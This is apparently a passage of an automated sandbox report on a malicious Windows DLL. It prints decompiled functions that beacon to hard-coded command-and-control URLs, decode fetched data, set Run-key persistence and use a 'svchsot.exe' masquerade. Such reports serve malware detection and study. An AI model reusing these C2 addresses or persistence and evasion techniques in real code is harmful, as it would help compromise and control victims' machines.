				_v80 = 0x44;
				_v72 = "wINsTA0\\dEFauLT";
				_v32 = 0;
				0x10036ac0(_t43, 0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v80,  &_v96, 0);
				_t35 = 1;
				return _t35;
			}

0x10008578
0x10008578
0x10008578
0x1000858f
0x10008596
0x100085a0
0x100085a4
0x100085ab
0x100085ac
0x100085ae
0x100085b1
0x100085bd
0x100085c2
0x100085c9
0x100085cb
0x100085d0
0x00000000
0x100085d0
0x100085d8
0x100085df
0x100085e5
0x100085e7
0x100085e9
0x100085fd
0x1000860e
0x10008616
0x1000861d
0x1000861e
0x10008623
0x1000863d
0x10008644
0x10008649
0x10008650
0x10008655

APIs

Sleep.KERNEL32(00002710), ref: 1000858F
Sleep.KERNEL32(001B7740), ref: 100085D0
wsprintfA.USER32 ref: 100085FD

Strings

c:\%d.log, xrefs: 100085F7
D, xrefs: 10008623
wINsTA0\dEFauLT, xrefs: 1000863D
aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=, xrefs: 10008591

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep$wsprintf
String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log$wINsTA0\dEFauLT
API String ID: 3195947292-2583752392
Opcode ID: 81d4b67f33cd8103372a750bc937ee3debd6cc9b6b879e214ebfa81445bf7d0f
Instruction ID: 80da11c417ec69a2b6a76b4d39b24a6af7efd0caae81726e88516388cc332cb8
Opcode Fuzzy Hash: 81d4b67f33cd8103372a750bc937ee3debd6cc9b6b879e214ebfa81445bf7d0f
Instruction Fuzzy Hash: 0E21D5B6C0021CBAEB11EBE4CC42EDFBB7CEF48390F140466F604BA141DA716E458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100044AD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,00000000,iphlpapi.dll,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 100044E9
GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,?,00000000,iphlpapi.dll,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 10004513

Strings

iphlpapi.dll, xrefs: 100044BC
C:\Users\user\Desktop\12071239, xrefs: 100044B9

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExtendedTable
String ID: C:\Users\user\Desktop\12071239$iphlpapi.dll
API String ID: 2407854163-1313959009
Opcode ID: 499cfaa8f9372a84d10054c90b2a6e2f2fca9727855b1882b36cc6280796b6f4
Instruction ID: f91f925f9b83e96973c7636e8e4c3350b19b26df2d9313003df76843625d1f5d
Opcode Fuzzy Hash: 499cfaa8f9372a84d10054c90b2a6e2f2fca9727855b1882b36cc6280796b6f4
Instruction Fuzzy Hash: 2721D4B5900909BFEB11DB688C81DBE77BCEF81396F224956F5509A186EB30AE408664

Uniqueness

Uniqueness Score: -1.00%

Function 10006AE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E10006AE3() {
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				L0:
				while(1) {
					L0:
					asm("les edx, [eax*4+0x680975c0]");
					L2:
					Sleep(0x2bf20); // executed
					L1:
					_push(0x1218);
					_push(_t4);
					E1000CCFC(_t4, _t5, _t8, _t9, _t11, _t8);
					_push(_t8);
					_push("5762479093"); // executed
					E10006499(_t4, _t5, _t6, _t7, _t8, _t11, _t12); // executed
					_t10 = _t10 + 0x14;
					continue;
					 *(__esi + 0x1214) = __ebx;
					__eax = CreateThread(__ebx, __ebx, E1000687E, __esi, __ebx, __ebx);
					__edi = __eax;
					0x10033df6(__edi, 0xffffffff);
					asm("invalid");
					L4:
					0x100314f6(__eax, __edi);
					goto L2;
				}
			}

0x10006ae3
0x10006ae3
0x10006ae3
0x10006ae3
0x10006ae9
0x10006aee
0x10006acb
0x10006acb
0x10006ad0
0x10006ad2
0x10006ad7
0x10006ad8
0x10006add
0x10006ae2
0x00000000
0x10006afc
0x10006b02
0x10006b08
0x10006b0d
0x10006b12
0x10006b13
0x10006b15
0x00000000
0x10006b15

APIs

Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546

Sleep.KERNEL32(0002BF20), ref: 10006AEE
CreateThread.KERNEL32(00000000,00000000,Function_0000687E,00000000,00000000,00000000), ref: 10006B02

Strings

5762479093, xrefs: 10006AD8

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateFormatSleepThreadTime___crtwsprintf
String ID: 5762479093
API String ID: 1808643731-3483958698
Opcode ID: dcb3929c8cbd93dc7e1bd02e5d37e618f0a974b1c80e1f068178b945f52ce8b6
Instruction ID: 9823e93c97f77b06fa5572501396a0b583494c1e5e7e9a8033287718f0397463
Opcode Fuzzy Hash: dcb3929c8cbd93dc7e1bd02e5d37e618f0a974b1c80e1f068178b945f52ce8b6
Instruction Fuzzy Hash: E7E0DFA014822A7AF211EB708DC6DBB2A5EDF173F43648528F428A518BEB609C258473

Uniqueness

Uniqueness Score: -1.00%

Function 1000842D Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 118sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,80000002,00000000,00000000,000F003F,?), ref: 1000856D

Strings

U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10008480
svchsot.exe, xrefs: 10008535

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$svchsot.exe
API String ID: 3472027048-2214221337
Opcode ID: cffbc5b1baab207dafd9a07c7f5021fee2451e83c4983c145358c973218ebce8
Instruction ID: 3f432ea22ec6b5eeb881382db9406ff9247849e33555dbb4a392728026724a00
Opcode Fuzzy Hash: cffbc5b1baab207dafd9a07c7f5021fee2451e83c4983c145358c973218ebce8
Instruction Fuzzy Hash: 2F311BB690015DBEEB11CBA4CD81DEFB7BDFB08284F1040B6F645E2105EA71AF458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10007112 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 95
sleepCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E10007112() {
				signed int _v8;
				void _v263;
				signed char _v264;
				void _v1287;
				signed char _v1288;
				void* _t23;
				void* _t24;
				void* _t30;
				signed int _t35;
				void* _t36;
				signed int _t40;
				void* _t44;
				void* _t51;
				signed int _t52;
				void* _t55;
				void* _t57;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t69;
				void* _t71;
				void* _t74;

				_t24 = E1000CCAE(_t23, 0x80000, _t44, _t56, _t57, _t64, _t66, _t71, _t74, 0x80000); // executed
				_t65 = _t24;
				while(1) {
					_v1288 = _v1288 & 0x00000000;
					memset( &_v1287, 0, 0xff << 2);
					_v264 = _v264 & 0x00000000;
					asm("stosw");
					asm("stosb");
					memset( &_v263, 0, 0 << 2);
					_t69 = _t67 + 0x18;
					asm("stosw");
					asm("stosb");
					_t30 = E10005C4C( &_v264, 0x100); // executed
					_t72 = _t30;
					_t51 = 0x3f;
					if(_t30 == 0) {
						_push("http://107.163.56.232:18963/main.php");
					} else {
						_push( &_v264);
					}
					_push("%s");
					_push( &_v1288);
					E10003EF4();
					_push(0x80000);
					_push(0);
					E1000CCFC(0x80000, _t51, _t65, _t66, _t72, _t65);
					_t35 = E100061BD(_t51, _t65, _t72, _t74,  &_v1288, _t65, 0x80000); // executed
					_t67 = _t69 + 0x24;
					_v8 = _t35;
					if(_t35 > 7) {
						_t52 = 0;
						__eflags = _t35;
						if(_t35 <= 0) {
							L11:
							_push(_t65);
							_t36 = E1000CD02(_t52, _t65);
							__eflags = _t36 - 0x10;
							if(_t36 <= 0x10) {
								_push(_t65);
								__eflags = E1000CDF2(_t65);
								_t55 = 0x10016ae0;
								if(__eflags != 0) {
									wsprintfA(0x10016ae0, "%s", _t65);
									_t67 = _t67 + 0xc;
									E1000570F(_t55, _t56, __eflags, _t74);
								}
							}
							goto L5;
						} else {
							goto L7;
						}
						do {
							L7:
							_t40 = _t52;
							asm("cdq");
							_t63 = 2;
							_t56 = _t40 % _t63;
							__eflags = _t40 % _t63;
							if(_t40 % _t63 == 0) {
								_t20 = _t52 + _t65;
								 *_t20 =  *(_t52 + _t65) + 0x4b;
								__eflags =  *_t20;
							} else {
								 *(_t52 + _t65) =  *(_t52 + _t65) + 0x3a;
							}
							_t52 = _t52 + 1;
							__eflags = _t52 - _v8;
						} while (_t52 < _v8);
						goto L11;
					}
					L5:
					Sleep( *0x10012500); // executed
				}
			}

0x10007124
0x1000712a
0x1000712c
0x1000712c
0x10007140
0x10007142
0x1000714b
0x1000714d
0x1000715c
0x1000715c
0x1000715e
0x10007160
0x10007168
0x1000716e
0x10007170
0x10007171
0x1000717c
0x10007173
0x10007179
0x10007179
0x10007187
0x1000718c
0x1000718d
0x10007195
0x10007196
0x10007199
0x100071a7
0x100071ac
0x100071b2
0x100071b5
0x100071c8
0x100071ca
0x100071cc
0x100071ea
0x100071ea
0x100071eb
0x100071f0
0x100071f4
0x100071fb
0x10007203
0x10007205
0x10007206
0x1000720f
0x10007215
0x10007218
0x10007218
0x10007206
0x00000000
0x00000000
0x00000000
0x00000000
0x100071ce
0x100071ce
0x100071ce
0x100071d2
0x100071d3
0x100071d4
0x100071d6
0x100071d8
0x100071e0
0x100071e0
0x100071e0
0x100071da
0x100071da
0x100071da
0x100071e4
0x100071e5
0x100071e5
0x00000000
0x100071ce
0x100071b7
0x100071bd
0x100071bd

APIs

Sleep.KERNEL32 ref: 100071BD
wsprintfA.USER32 ref: 1000720F

Strings

http://107.163.56.232:18963/main.php, xrefs: 1000717C

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleepwsprintf
String ID: http://107.163.56.232:18963/main.php
API String ID: 1749205058-3919619334
Opcode ID: b5d0bec9b7d6edd60cc6ed646ffe3ccda022ea413c9355326a19837c98786684
Instruction ID: 54bd4540d716e36ea29f190889fbbfc8768f4e24644525e17297a910cae38aae
Opcode Fuzzy Hash: b5d0bec9b7d6edd60cc6ed646ffe3ccda022ea413c9355326a19837c98786684
Instruction Fuzzy Hash: E0213E76D0465576F725D328CC56FDF7BACEF053C4F2000A6F608A50C6EB79AA818A61

Uniqueness

Uniqueness Score: -1.00%

Function 100061BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
timeCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E100061BD(void* __ecx, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v1036;
				void* __ebx;
				void* __ebp;
				void* _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t37;
				void* _t39;
				char _t44;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				_t44 = 0;
				_t37 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = 0;
				_t19 = E10001000(__ecx, __eflags, __fp0, "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1"); // executed
				_pop(_t39);
				_push(_t19); // executed
				_t20 = E10003F0A(); // executed
				_t50 = _t49 + 0x14;
				_v12 = _t20;
				if(_t20 != 0) {
					_t21 = E10003F24(_t20, _a4, 0, 0, 0x80000100, 0); // executed
					_t51 = _t50 + 0x18;
					__eflags = _t21;
					_a4 = _t21;
					if(_t21 != 0) {
						__eflags = _a4 - 0xffffffff;
						if(__eflags == 0) {
							L9:
							E10003F58(_a4);
							_t44 = _t37;
							L10:
							E10003F58(_v12);
							return _t44;
						}
						while(1) {
							_push(0x400);
							_push(_t44);
							E1000CCFC(_t37, _t39, 0x400, _t48, __eflags,  &_v1036);
							E10003F41(_a4,  &_v1036, 0x400,  &_v8);
							_push(_v8);
							_push( &_v1036);
							_push(_a8 + _t37);
							E1000CD50(_a8 + _t37, 0x400);
							_t37 = _t37 + _v8;
							_t51 = _t51 + 0x28;
							__eflags = _v8 - _t44;
							if(_v8 <= _t44) {
								break;
							}
							__eflags = _t37 - _a12;
							if(__eflags < 0) {
								continue;
							}
							break;
						}
						E10003F92(_a4);
						goto L9;
					}
					E10003F58(0);
					goto L10;
				}
				return 0;
			}

0x100061c8
0x100061ca
0x100061cc
0x100061cd
0x100061ce
0x100061cf
0x100061d5
0x100061d8
0x100061dd
0x100061de
0x100061df
0x100061e4
0x100061e9
0x100061ec
0x10006201
0x10006206
0x10006209
0x1000620b
0x1000620e
0x10006219
0x1000621d
0x10006276
0x10006279
0x1000627f
0x10006281
0x10006284
0x00000000
0x1000628a
0x10006225
0x10006225
0x1000622c
0x1000622e
0x10006242
0x10006247
0x10006250
0x10006256
0x10006257
0x1000625c
0x1000625f
0x10006262
0x10006265
0x00000000
0x00000000
0x10006267
0x1000626a
0x00000000
0x00000000
0x00000000
0x1000626a
0x1000626f
0x00000000
0x10006275
0x10006211
0x00000000
0x10006216
0x00000000

APIs

Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C

___crtGetTimeFormatEx.LIBCMT ref: 10006201

Strings

TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061D0

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FormatInternetOpenTime___crt
String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
API String ID: 483802873-1756078650
Opcode ID: c6c6c64790840cf0151d658e98ff9a9019296a6371422ff4503929091a591302
Instruction ID: ab7613da0529a9e7ad045271e1496bf6998c2837bea1459af3b68005a9a4b910
Opcode Fuzzy Hash: c6c6c64790840cf0151d658e98ff9a9019296a6371422ff4503929091a591302
Instruction Fuzzy Hash: 3D21C275D0014DBAEF21DB65DC89D9F7BBEDB852D0F20807AF608A6045EA31AA818660

Uniqueness

Uniqueness Score: -1.00%

Function 10006290 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10006290(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t3;
				void* _t5;

				_t3 = E10003F0A(E10001000(__ecx, __eflags, __fp0, "TW96aWxsYS80LjAgKGNvbXBhdGlibGUp"), 0, 0, 0, 0); // executed
				_t13 = _t3;
				if(_t3 != 0) {
					_t5 = E10003F24(_t13, _a4, 0, 0, 0x80000100, 0); // executed
					if(_t5 != 0) {
						_push(_t5);
					} else {
						_push(0);
					}
					E10003F58();
					E10003F58(_t13);
				}
				return 0;
			}

0x100062a4
0x100062a9
0x100062b0
0x100062bf
0x100062c9
0x100062ce
0x100062cb
0x100062cb
0x100062cb
0x100062cf
0x100062d5
0x100062db
0x100062e0

APIs

Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C

___crtGetTimeFormatEx.LIBCMT ref: 100062BF

Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,?,00000000,100062C4), ref: 10003F39

Strings

TW96aWxsYS80LjAgKGNvbXBhdGlibGUp, xrefs: 10006298

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: InternetOpen$FormatTime___crt
String ID: TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
API String ID: 1165476586-1918919809
Opcode ID: 57b5a40d3fc3883ed3a3a8e113ead5f75d397a2c12f85476ce192d17b168c2e0
Instruction ID: e1df23a7d6fc88136f19512af0817ca3ec1a39d4f872029b50130054e15d899c
Opcode Fuzzy Hash: 57b5a40d3fc3883ed3a3a8e113ead5f75d397a2c12f85476ce192d17b168c2e0
Instruction Fuzzy Hash: 61E0D832D089D238BA33E1671C0ED9F1EBDCBC7AF0B71402DF9489100EE8556485C0B5

Uniqueness

Uniqueness Score: -1.00%

Function 10008208 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E10008208() {
				char _v24;
				void* _t6;
				intOrPtr _t11;
				void* _t15;
				void* _t17;
				void* _t26;

				while(1) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					_t11 = 0;
					_t17 = 0x18;
					do {
						_t6 = L10007F4F(_t15, _t26,  &_v24); // executed
						if(_t6 != 0) {
							_push(1);
							 *0x10017b90 = _t11;
							_pop(0);
						}
						_v24 = _v24 + 1;
						_t17 = _t17 - 1;
					} while (_t17 != 0);
					 *0x10017b94 = 0;
					do {
						_t20 = "c:";
						 *((char*)("c:")) = _t11 + 0x61;
						if(E1000400A("c:") == 3) {
							L10007F4F(_t15, _t26, _t20); // executed
						}
						_t11 = _t11 + 1;
					} while (_t11 < 0x1a);
					Sleep(0x36ee80); // executed
				}
			}

0x10008211
0x10008219
0x1000821a
0x1000821b
0x1000821c
0x1000821d
0x10008221
0x10008225
0x10008226
0x1000822a
0x10008232
0x10008234
0x10008236
0x1000823c
0x1000823c
0x1000823d
0x10008240
0x10008240
0x10008243
0x10008249
0x1000824b
0x10008253
0x10008261
0x10008264
0x10008269
0x1000826a
0x1000826b
0x10008275
0x10008275

APIs

Sleep.KERNEL32(0036EE80), ref: 10008275

Strings

C:\Program Files, xrefs: 10008211

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: C:\Program Files
API String ID: 3472027048-1387799010
Opcode ID: 9afeee0ed7ce9f56edc86bd1ea08c8183094d24e33545e6115e7320213a91ecd
Instruction ID: d64c08f7848b6e56d662ed05996509d3b2f9a4b4559b092b9281e72653b8b67e
Opcode Fuzzy Hash: 9afeee0ed7ce9f56edc86bd1ea08c8183094d24e33545e6115e7320213a91ecd
Instruction Fuzzy Hash: A1F0AC769046A1AAF601CF940DC15CF77ACFB122A4B101022FA44BA046D7B19E0147E2

Uniqueness

Uniqueness Score: -1.00%

Function 10006B30 Relevance: 3.0, APIs: 2, Instructions: 48
threadCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10006B30(void* __edx, void* _a4) {
				char _v404;
				long _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t12;
				void* _t13;

				_t12 = __edx;
				0x10037c48(_t9, 0x202,  &_v404);
				_t10 = _a4;
				 *((intOrPtr*)(_t10 + 0x1214)) = 0;
				_t13 = E10003ECE(0, 0, _t10);
				_t7 = GetLastError();
				if(_t7 != 0xb7) {
					L1:
					_t8 = CreateThread(0, 0, E1000687E, _t10, 0, 0); // executed
					0x10039d58(_t8, 0xffffffff);
					0x1003c377();
					_t10 = 0x4e20d0;
					asm("adc eax, 0x1000e0b0"); // executed
					goto L1;
				}
				0x1002fe96(_t12, _t13);
				return _t7;
			}

0x10006b30
0x10006b49
0x10006b4e
0x10006b56
0x10006b64
0x10006b66
0x10006b70
0x10006b72
0x10006b7c
0x10006b87
0x10006b8e
0x10006b98
0x10006b9a
0x00000000
0x10006b9a
0x10006ba3
0x10006bac

APIs

Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B61,00000000,00000000,?,?,00000202,?), ref: 10003EDA

GetLastError.KERNEL32 ref: 10006B66
CreateThread.KERNEL32(00000000,00000000,1000687E,?,00000000,00000000), ref: 10006B7C

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Create$ErrorLastMutexThread
String ID:
API String ID: 2493691075-0
Opcode ID: 3af9e7ef5a81bde3ebdb3565e676664ed2f8d6487fc3cc4dfbae9c29a7e1a43f
Instruction ID: 6b7b08fd01f8edd59fd4bb6fc29013329b5f4216a97b85f05c55edfd73395ade
Opcode Fuzzy Hash: 3af9e7ef5a81bde3ebdb3565e676664ed2f8d6487fc3cc4dfbae9c29a7e1a43f
Instruction Fuzzy Hash: 7BF04CB5401264BEE62293715C8ACEF3A6CDF863E1F100035FD08E6146DA249D0182F2

Uniqueness

Uniqueness Score: -1.00%

Function 10006B28 Relevance: 3.0, APIs: 2, Instructions: 42threadCOMMON

Download Yara Rule

APIs

Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B61,00000000,00000000,?,?,00000202,?), ref: 10003EDA

GetLastError.KERNEL32 ref: 10006B66
CreateThread.KERNEL32(00000000,00000000,1000687E,?,00000000,00000000), ref: 10006B7C

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Create$ErrorLastMutexThread
String ID:
API String ID: 2493691075-0
Opcode ID: e89be578e8148a7335b22e0c9b632b386793c7a30c553ecdde78e1e69eb4abc6
Instruction ID: d2b0050193654c84d471cf77aacb88838c46bf9d5c4ba750d0ee673067b4f21b
Opcode Fuzzy Hash: e89be578e8148a7335b22e0c9b632b386793c7a30c553ecdde78e1e69eb4abc6
Instruction Fuzzy Hash: BFF09CB1401164BEE71297614C8ADEF3A5CDF463E4F144125BD18A618ADA245D5582B2

Uniqueness

Uniqueness Score: -1.00%

